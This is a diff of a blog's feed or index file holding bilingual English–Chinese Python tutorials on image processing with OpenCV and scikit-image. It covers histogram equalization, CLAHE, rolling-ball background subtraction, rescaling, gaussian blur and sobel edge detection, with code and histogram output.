    ax1.title.set_text('Input Image')

    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(equ_RGB)
    ax2.title.set_text('Equalized using RGB channels')

    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(equ_hsv)
    ax3.title.set_text('Equalized using v channel in hsv')

    plt.show()

    png

    ]]>
    @@ -9354,7 +9354,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(42-43)-CLAHE/ - 正文

    Tutorial 42 - Histogram equalization and contrast limited adaptive histogram equalization -CLAHE-

    import cv2
    from skimage import io
    import matplotlib.pyplot as plt

    img = cv2.imread('images/sandstone_low_contrast.tif', 1)
    lab_img = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
    l, a, b = cv2.split(lab_img)
    • numpy.ndarray.flat

      • Return a copy of the array collapsed into one dimension.
        • 返回折叠成一维的数组的副本
    • 绘制直方图

    plt.hist(l.flat, bins=100, range=(0, 255))
    (array([    0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,   673.,   450.,         1451.,  4419.,  5375.,  9157.,  6488.,  6910.,  3772.,  3025.,         3818.,  6242.,  7224.,  4729., 14421., 25340., 74157., 44002.,        49095., 14752., 11771.,  3968.,  4044.,  2290.,   627.,   960.,          529.,   722.,   384.,   667.,   612.,  1083.,  2254.,   869.,         7914.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    • Apply histogram equalization to the L channel

    Histogram equalization 直方图均衡化

    • Histogram equalization enhances the contrast of an image by spreading the pixel histogram value.
      • 直方图均衡化通过扩展像素直方图值来增强图像的对比度。

    png

    • Histogram equalization can lead to too bright or dark regions as the contrast is not limited.
      • 直方图均衡化会导致对比不受限制的区域过于明亮或黑暗。
    equ = cv2.equalizeHist(l)
    plt.hist(equ.flat, bins=100, range=(0, 255))
    (array([ 3620.,  3373.,  2415.,  2960.,  3320.,  3508.,  2329.,  3384.,         3104.,  4863.,  2047.,  3772.,  3025.,  3818.,  2083.,  4159.,         2247.,  2386.,  5356.,  1964.,  3496.,  4454.,     0.,  6471.,            0.,     0.,     0., 10157.,     0.,     0.,     0., 15183.,            0.,     0.,     0.,     0.,     0.,     0., 20592.,     0.,            0.,     0.,     0.,     0.,     0.,     0., 25633.,     0.,            0.,     0.,     0.,     0.,     0.,     0., 27932.,     0.,            0.,     0.,     0.,     0., 18417.,     0.,     0.,     0.,            0.,     0.,     0.,     0., 25585.,     0.,     0.,     0.,            0.,     0., 21147.,     0.,     0.,     0.,     0.,     0.,        16077.,     0.,     0., 11871.,     0.,     0.,  8441.,     0.,         6311.,  4639.,  3890.,  3242.,  3968.,  3019.,  3942.,  2595.,         2882.,  2949.,     0.,  7568.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    • Combine the Hist. equalized L-channel back with A and B channels
    updated_lab_img1 = cv2.merge((equ, a, b))
    • Convert LAB image back to color (RGB)
    hist_eq_img = cv2.cvtColor(updated_lab_img1, cv2.COLOR_LAB2BGR)

    CLAHE

    • Image Enhancement - CLAHE - 知乎
    • Contrast Limited Adaptive Histogram Equalization (CLAHE) 对比度受限自适应直方图均衡化(CLAHE)
      • Adaptive histogram equalization divides image into small blocks ($8\times8$ tiles default in opencv).
        • 自适应直方图均衡将图像划分为小块($8\times8$ tiles 在 opencv 默认)。
      • Each block is histogram equalized.
        • 每个块都是直方图均衡化。
      • To minimize noise amplification, contrast limiting is applied (default 40 in opencv)
        • 为了最小化噪声放大,应用了对比度限制(opencv 中默认为 40)
    clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8, 8))
    clahe_img = clahe.apply(l)
    plt.hist(clahe_img.flat, bins=100, range=(0, 255))
    (array([    0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,    80.,    70.,   261.,   438.,   435.,   967.,          918.,  1781.,  1373.,  2373.,  1964.,  2956.,  3179.,  2223.,         3424.,  2212.,  3209.,  2219.,  3232.,  2075.,  3101.,  2047.,         3108.,  3122.,  2148.,  3320.,  2242.,  3618.,  2594.,  4079.,         2903.,  4743.,  5575.,  4406.,  7857.,  5992., 10625.,  8206.,        14198., 10454., 17020., 12111., 18115., 18205., 11821., 16331.,        10015., 13274.,  7932., 10369.,  5565.,  7210.,  5721.,  3289.,         3961.,  2062.,  2873.,  1624.,  2026.,  1120.,  1771.,  1049.,         1131.,   950.,   756.,  1819.,  2148.,  3186.,   263.,   652.,           98.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    updated_lab_img2 = cv2.merge((clahe_img, a, b))
    CLAHE_img = cv2.cvtColor(updated_lab_img2, cv2.COLOR_LAB2BGR)
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Original image')
    ax2 = fig.add_subplot(132)
    ax2.imshow(hist_eq_img, cmap='gray')
    ax2.title.set_text('Equalized image')
    ax3 = fig.add_subplot(133)
    ax3.imshow(CLAHE_img, cmap='gray')
    ax3.title.set_text('CLAHE Image')

    png

    Tutorial 43 - Shading correction using rolling ball background subtraction

    Rolling Ball Background Subtraction - ImageJ

    This plugin tries to correct for uneven illuminated background by using a “rolling ball” algorithm.
    A local background value is determined for every pixel by averaging over a very large ball around the pixel. This value is hereafter subtracted from the original image, hopefully removing large spatial variations of the background intensities. The radius should be set to at least the size of the largest object that is not part of the background.
    This plugin implements (differently) the same algorithm as the one built-in ImageJ in the Process › Subtract background menu, but adds a useful Preview capability. Also, to display the background subtracted in a separate (new) window, hold the ALT key when pressing “OK” (Preview must be off).
    The rolling-ball algorithm was inspired by Stanley Sternberg’s article, “Biomedical Image Processing”, IEEE Computer, January 1983.

    这个插件试图通过使用“滚动球”算法来纠正不均匀的照明背景。
    局部背景值是通过在像素周围的一个非常大的球上取平均值来确定的。
    这个值以后从原始图像中减去,希望去除大的空间变化的背景强度。
    半径应该至少设置为不属于背景的最大物体的大小。
    这个插件实现了与 Process›Subtract 背景菜单中内置的 ImageJ 相同的算法(不同),但是增加了一个有用的预览功能。
    此外,要在一个单独的(新)窗口中显示减去的背景,按住 ALT 键时按“OK”(预览必须关闭)。
    滚动球算法的灵感来自 Stanley Sternberg 的文章,“生物医学图像处理”,发表于 IEEE 计算机,1983 年 1 月。

    • Popular imageJ plugin for background subtraction.

      • 流行的 imageJ 插件,用于背景减法。
    • Only works on 8 bit grey images.

      • 只适用于 8 位灰色图像。
    • “Imagine that the 2D grayscale image has a third (height) dimension by the image value at every point in the image, creating a surface.A ball of given radius is rolled over the bottom side of this surface;the hull of the volume reachable by the ball is the background.”

      • 假设 2D 灰度图像有第三维度(高度),即图像中每一点的图像值,从而创建一个曲面。
        一个给定半径的球滚过这个表面的底边;球所能到达的体积的船体是背景
    • A great algorithm for particle detection type applications.

      • 一个伟大的算法用于粒子检测类型的应用。

    1st approach: Perform CLAHE

    • Equalize light by performing CLAHE on the Luminance channel

      • 通过在亮度通道上执行 CLAHE 来平衡光线
    • The equalize part alreay covered as aprt of previous tutorials about CLAHE

      • 均衡部分已经在以前关于 CLAHE 的教程中介绍过了
    • This kind of works but you can still see shading after the correction.

      • 这类作品,但你仍然可以看到阴影校正后。
    import cv2
    import numpy as np

    img = cv2.imread("images/Ti_powder.tif", 1)

    lab_img = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
    l, a, b = cv2.split(lab_img)


    clahe = cv2.createCLAHE(clipLimit=3, tileGridSize=(8,8))
    clahe_img = clahe.apply(l)
    CLAHE_img = cv2.merge((clahe_img,a,b))

    corrected_image = cv2.cvtColor(CLAHE_img, cv2.COLOR_LAB2BGR)

    cv2.imshow("Original image", img)
    cv2.imshow("Corrected image", corrected_image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    2nd approach:

    • Apply rolling ball background subtraction

      • 应用滚动球背景减法
    • pip install opencv-rolling-ball

    pip install opencv-rolling-ball
    Collecting opencv-rolling-ball  Downloading opencv-rolling-ball-1.0.1.tar.gz (6.2 kB)  Preparing metadata (setup.py): started  Preparing metadata (setup.py): finished with status 'done'Requirement already satisfied: opencv-python in c:\users\gzjzx\anaconda3\lib\site-packages (from opencv-rolling-ball) (4.6.0.66)Requirement already satisfied: numpy in c:\users\gzjzx\anaconda3\lib\site-packages (from opencv-rolling-ball) (1.23.1)Building wheels for collected packages: opencv-rolling-ball  Building wheel for opencv-rolling-ball (setup.py): started  Building wheel for opencv-rolling-ball (setup.py): finished with status 'done'  Created wheel for opencv-rolling-ball: filename=opencv_rolling_ball-1.0.1-py3-none-any.whl size=6877sha256=635254917753eb044afaf6cc9ce2f9bd5205081c9a5daa8c1101cb525d73a669  Stored in directory: c:\users\gzjzx\appdata\local\pip\cache\wheels\b6\cf\88\7ebc10f8425fbc46777a6e6a3d6964d35277134981ca85757bSuccessfully built opencv-rolling-ballInstalling collected packages: opencv-rolling-ballSuccessfully installed opencv-rolling-ball-1.0.1Note: you may need to restart the kernel to use updated packages.
    import cv2
    from cv2_rolling_ball import subtract_background_rolling_ball
    from matplotlib import pyplot as plt

    img = cv2.imread("images/Ti_powder.tif", 0)

    radius=20
    final_img, background = subtract_background_rolling_ball(img, radius, light_background=True,
    use_paraboloid=False, do_presmooth=True)


    #optionally perform CLAHE to equalize histogram for better segmentation
    #otherwise the image may appear washedout.

    clahe = cv2.createCLAHE(clipLimit=3, tileGridSize=(8,8))
    clahe_img = clahe.apply(final_img)

    #cv2.imshow("Original image", img)
    cv2.imshow("Background image", background)
    cv2.imshow("AFter background subtraction", final_img)
    cv2.imshow("After CLAHE", clahe_img)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    ]]>
    + 正文

    Tutorial 42 - Histogram equalization and contrast limited adaptive histogram equalization -CLAHE-

    1
    2
    3
    4
    5
    6
    7
    import cv2
    from skimage import io
    import matplotlib.pyplot as plt

    img = cv2.imread('images/sandstone_low_contrast.tif', 1)
    lab_img = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
    l, a, b = cv2.split(lab_img)
    • numpy.ndarray.flat

      • Return a copy of the array collapsed into one dimension.
        • 返回折叠成一维的数组的副本
    • 绘制直方图

    1
    plt.hist(l.flat, bins=100, range=(0, 255))
    (array([    0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,   673.,   450.,         1451.,  4419.,  5375.,  9157.,  6488.,  6910.,  3772.,  3025.,         3818.,  6242.,  7224.,  4729., 14421., 25340., 74157., 44002.,        49095., 14752., 11771.,  3968.,  4044.,  2290.,   627.,   960.,          529.,   722.,   384.,   667.,   612.,  1083.,  2254.,   869.,         7914.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    • Apply histogram equalization to the L channel

    Histogram equalization 直方图均衡化

    • Histogram equalization enhances the contrast of an image by spreading the pixel histogram value.
      • 直方图均衡化通过扩展像素直方图值来增强图像的对比度。

    png

    • Histogram equalization can lead to too bright or dark regions as the contrast is not limited.
      • 直方图均衡化会导致对比不受限制的区域过于明亮或黑暗。
    1
    equ = cv2.equalizeHist(l)
    1
    plt.hist(equ.flat, bins=100, range=(0, 255))
    (array([ 3620.,  3373.,  2415.,  2960.,  3320.,  3508.,  2329.,  3384.,         3104.,  4863.,  2047.,  3772.,  3025.,  3818.,  2083.,  4159.,         2247.,  2386.,  5356.,  1964.,  3496.,  4454.,     0.,  6471.,            0.,     0.,     0., 10157.,     0.,     0.,     0., 15183.,            0.,     0.,     0.,     0.,     0.,     0., 20592.,     0.,            0.,     0.,     0.,     0.,     0.,     0., 25633.,     0.,            0.,     0.,     0.,     0.,     0.,     0., 27932.,     0.,            0.,     0.,     0.,     0., 18417.,     0.,     0.,     0.,            0.,     0.,     0.,     0., 25585.,     0.,     0.,     0.,            0.,     0., 21147.,     0.,     0.,     0.,     0.,     0.,        16077.,     0.,     0., 11871.,     0.,     0.,  8441.,     0.,         6311.,  4639.,  3890.,  3242.,  3968.,  3019.,  3942.,  2595.,         2882.,  2949.,     0.,  7568.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    • Combine the Hist. equalized L-channel back with A and B channels
    1
    updated_lab_img1 = cv2.merge((equ, a, b))
    • Convert LAB image back to color (RGB)
    1
    hist_eq_img = cv2.cvtColor(updated_lab_img1, cv2.COLOR_LAB2BGR)

    CLAHE

    • Image Enhancement - CLAHE - 知乎
    • Contrast Limited Adaptive Histogram Equalization (CLAHE) 对比度受限自适应直方图均衡化(CLAHE)
      • Adaptive histogram equalization divides image into small blocks ($8\times8$ tiles default in opencv).
        • 自适应直方图均衡将图像划分为小块($8\times8$ tiles 在 opencv 默认)。
      • Each block is histogram equalized.
        • 每个块都是直方图均衡化。
      • To minimize noise amplification, contrast limiting is applied (default 40 in opencv)
        • 为了最小化噪声放大,应用了对比度限制(opencv 中默认为 40)
    1
    2
    clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8, 8))
    clahe_img = clahe.apply(l)
    1
    plt.hist(clahe_img.flat, bins=100, range=(0, 255))
    (array([    0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,    80.,    70.,   261.,   438.,   435.,   967.,          918.,  1781.,  1373.,  2373.,  1964.,  2956.,  3179.,  2223.,         3424.,  2212.,  3209.,  2219.,  3232.,  2075.,  3101.,  2047.,         3108.,  3122.,  2148.,  3320.,  2242.,  3618.,  2594.,  4079.,         2903.,  4743.,  5575.,  4406.,  7857.,  5992., 10625.,  8206.,        14198., 10454., 17020., 12111., 18115., 18205., 11821., 16331.,        10015., 13274.,  7932., 10369.,  5565.,  7210.,  5721.,  3289.,         3961.,  2062.,  2873.,  1624.,  2026.,  1120.,  1771.,  1049.,         1131.,   950.,   756.,  1819.,  2148.,  3186.,   263.,   652.,           98.,     0.,     0.,     0.,     0.,     0.,     0.,     0.,            0.,     0.,     0.,     0.]), array([  0.  ,   2.55,   5.1 ,   7.65,  10.2 ,  12.75,  15.3 ,  17.85,         20.4 ,  22.95,  25.5 ,  28.05,  30.6 ,  33.15,  35.7 ,  38.25,         40.8 ,  43.35,  45.9 ,  48.45,  51.  ,  53.55,  56.1 ,  58.65,         61.2 ,  63.75,  66.3 ,  68.85,  71.4 ,  73.95,  76.5 ,  79.05,         81.6 ,  84.15,  86.7 ,  89.25,  91.8 ,  94.35,  96.9 ,  99.45,        102.  , 104.55, 107.1 , 109.65, 112.2 , 114.75, 117.3 , 119.85,        122.4 , 124.95, 127.5 , 130.05, 132.6 , 135.15, 137.7 , 140.25,        142.8 , 145.35, 147.9 , 150.45, 153.  , 155.55, 158.1 , 160.65,        163.2 , 165.75, 168.3 , 170.85, 173.4 , 175.95, 178.5 , 181.05,        183.6 , 186.15, 188.7 , 191.25, 193.8 , 196.35, 198.9 , 201.45,        204.  , 206.55, 209.1 , 211.65, 214.2 , 216.75, 219.3 , 221.85,        224.4 , 226.95, 229.5 , 232.05, 234.6 , 237.15, 239.7 , 242.25,        244.8 , 247.35, 249.9 , 252.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    1
    updated_lab_img2 = cv2.merge((clahe_img, a, b))
    1
    CLAHE_img = cv2.cvtColor(updated_lab_img2, cv2.COLOR_LAB2BGR)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    fig = plt.figure(figsize=(12, 12))
    ax1 = fig.add_subplot(131)
    ax1.imshow(img, cmap='gray')
    ax1.title.set_text('Original image')
    ax2 = fig.add_subplot(132)
    ax2.imshow(hist_eq_img, cmap='gray')
    ax2.title.set_text('Equalized image')
    ax3 = fig.add_subplot(133)
    ax3.imshow(CLAHE_img, cmap='gray')
    ax3.title.set_text('CLAHE Image')

    png

    Tutorial 43 - Shading correction using rolling ball background subtraction

    Rolling Ball Background Subtraction - ImageJ

    This plugin tries to correct for uneven illuminated background by using a “rolling ball” algorithm.
    A local background value is determined for every pixel by averaging over a very large ball around the pixel. This value is hereafter subtracted from the original image, hopefully removing large spatial variations of the background intensities. The radius should be set to at least the size of the largest object that is not part of the background.
    This plugin implements (differently) the same algorithm as the one built-in ImageJ in the Process › Subtract background menu, but adds a useful Preview capability. Also, to display the background subtracted in a separate (new) window, hold the ALT key when pressing “OK” (Preview must be off).
    The rolling-ball algorithm was inspired by Stanley Sternberg’s article, “Biomedical Image Processing”, IEEE Computer, January 1983.

    这个插件试图通过使用“滚动球”算法来纠正不均匀的照明背景。
    局部背景值是通过在像素周围的一个非常大的球上取平均值来确定的。
    这个值以后从原始图像中减去,希望去除大的空间变化的背景强度。
    半径应该至少设置为不属于背景的最大物体的大小。
    这个插件实现了与 Process›Subtract 背景菜单中内置的 ImageJ 相同的算法(不同),但是增加了一个有用的预览功能。
    此外,要在一个单独的(新)窗口中显示减去的背景,按住 ALT 键时按“OK”(预览必须关闭)。
    滚动球算法的灵感来自 Stanley Sternberg 的文章,“生物医学图像处理”,发表于 IEEE 计算机,1983 年 1 月。

    • Popular imageJ plugin for background subtraction.

      • 流行的 imageJ 插件,用于背景减法。
    • Only works on 8 bit grey images.

      • 只适用于 8 位灰色图像。
    • “Imagine that the 2D grayscale image has a third (height) dimension by the image value at every point in the image, creating a surface.A ball of given radius is rolled over the bottom side of this surface;the hull of the volume reachable by the ball is the background.”

      • 假设 2D 灰度图像有第三维度(高度),即图像中每一点的图像值,从而创建一个曲面。
        一个给定半径的球滚过这个表面的底边;球所能到达的体积的船体是背景
    • A great algorithm for particle detection type applications.

      • 一个伟大的算法用于粒子检测类型的应用。

    1st approach: Perform CLAHE

    • Equalize light by performing CLAHE on the Luminance channel

      • 通过在亮度通道上执行 CLAHE 来平衡光线
    • The equalize part alreay covered as aprt of previous tutorials about CLAHE

      • 均衡部分已经在以前关于 CLAHE 的教程中介绍过了
    • This kind of works but you can still see shading after the correction.

      • 这类作品,但你仍然可以看到阴影校正后。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    import cv2
    import numpy as np

    img = cv2.imread("images/Ti_powder.tif", 1)

    lab_img = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)
    l, a, b = cv2.split(lab_img)


    clahe = cv2.createCLAHE(clipLimit=3, tileGridSize=(8,8))
    clahe_img = clahe.apply(l)
    CLAHE_img = cv2.merge((clahe_img,a,b))

    corrected_image = cv2.cvtColor(CLAHE_img, cv2.COLOR_LAB2BGR)

    cv2.imshow("Original image", img)
    cv2.imshow("Corrected image", corrected_image)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    2nd approach:

    • Apply rolling ball background subtraction

      • 应用滚动球背景减法
    • pip install opencv-rolling-ball

    1
    pip install opencv-rolling-ball
    Collecting opencv-rolling-ball  Downloading opencv-rolling-ball-1.0.1.tar.gz (6.2 kB)  Preparing metadata (setup.py): started  Preparing metadata (setup.py): finished with status 'done'Requirement already satisfied: opencv-python in c:\users\gzjzx\anaconda3\lib\site-packages (from opencv-rolling-ball) (4.6.0.66)Requirement already satisfied: numpy in c:\users\gzjzx\anaconda3\lib\site-packages (from opencv-rolling-ball) (1.23.1)Building wheels for collected packages: opencv-rolling-ball  Building wheel for opencv-rolling-ball (setup.py): started  Building wheel for opencv-rolling-ball (setup.py): finished with status 'done'  Created wheel for opencv-rolling-ball: filename=opencv_rolling_ball-1.0.1-py3-none-any.whl size=6877sha256=635254917753eb044afaf6cc9ce2f9bd5205081c9a5daa8c1101cb525d73a669  Stored in directory: c:\users\gzjzx\appdata\local\pip\cache\wheels\b6\cf\88\7ebc10f8425fbc46777a6e6a3d6964d35277134981ca85757bSuccessfully built opencv-rolling-ballInstalling collected packages: opencv-rolling-ballSuccessfully installed opencv-rolling-ball-1.0.1Note: you may need to restart the kernel to use updated packages.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    import cv2
    from cv2_rolling_ball import subtract_background_rolling_ball
    from matplotlib import pyplot as plt

    img = cv2.imread("images/Ti_powder.tif", 0)

    radius=20
    final_img, background = subtract_background_rolling_ball(img, radius, light_background=True,
    use_paraboloid=False, do_presmooth=True)


    #optionally perform CLAHE to equalize histogram for better segmentation
    #otherwise the image may appear washedout.

    clahe = cv2.createCLAHE(clipLimit=3, tileGridSize=(8,8))
    clahe_img = clahe.apply(final_img)

    #cv2.imshow("Original image", img)
    cv2.imshow("Background image", background)
    cv2.imshow("AFter background subtraction", final_img)
    cv2.imshow("After CLAHE", clahe_img)

    cv2.waitKey(0)
    cv2.destroyAllWindows()

    png

    ]]>
    @@ -9381,7 +9381,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(29-41)-Image%20Filtering/ - 正文

    Tutorial 29 -Basic image processing using scikit-image library

    缩放

    Rescale, resize, and downscale — skimage v0.19.2 docs

    • Rescale 操作按给定的缩放因子调整图像的大小。缩放因子可以是单个浮点值,也可以是多个值——每个轴上都有一个。
    • Resize 也有同样的作用,但允许指定输出图像的形状而不是缩放因子。
    • Downscale 的目的是通过整数因子对 n 维图像进行下采样,使用作为函数参数的大小因子的每个块的元素的局部均值。
    from matplotlib import pyplot as plt
    from skimage import io, color
    from skimage.transform import rescale, resize, downscale_local_mean
    img = io.imread('images/Osteosarcoma_01.tif', as_gray=True)  # 读取文件

    img_rescaled = rescale(img, 1.0 / 4.0, anti_aliasing=False) # 按比例缩放

    img_resized = resize(img, (200, 200), anti_aliasing=True) # 按大小缩放
    plt.imshow(img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212d8734a48>

    png

    plt.imshow(img_rescaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db1f7ac8>

    png

    plt.imshow(img_resized, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db2830c8>

    png

    img_downscaled = downscale_local_mean(img, (4, 3))  # 拉伸
    plt.imshow(img_downscaled, cmap='gray')
    <matplotlib.image.AxesImage at 0x212db506788>

    png

    gaussian 模糊

    from skimage import io
    from skimage.filters import gaussian, sobel
    img = io.imread("images/Osteosarcoma_01_25Sigma_noise.tif")
    plt.imshow(img)
    gaussian_using_skimage = gaussian(img, sigma=1, mode='constant', cval=0.0)
    plt.imshow(gaussian_using_skimage)
    C:\Users\gzjzx\anaconda3\envs\wxpython37\lib\site-packages\skimage\_shared\utils.py:348: RuntimeWarning: Images with dimensions (M, N, 3) are interpreted as 2D+RGB by default. Use `multichannel=False` to interpret as 3D image with last dimension of length 3.  return func(*args, **kwargs)<matplotlib.image.AxesImage at 0x212dbb52848>

    png

    sobel 边缘检测

    img_gray = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    sobel_img = sobel(img_gray) #Works only on 2D (gray) images
    plt.imshow(sobel_img, cmap='gray')
    <matplotlib.image.AxesImage at 0x212dc0185c8>

    png
    ## Tutorial 30 - Basic image processing using opencv in python

    使用 OpenCV 操作下面这张图:

    jpg

    OpenCV 读取到的都是 BGR 颜色通道, 此时使用 matplotlib 显示会导致颜色发生变化

    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread('images/RGBY.jpg', 1) # Color is BGR not RGB
    plt.imshow(img)
    <matplotlib.image.AxesImage at 0x1e3d6809370>

    png

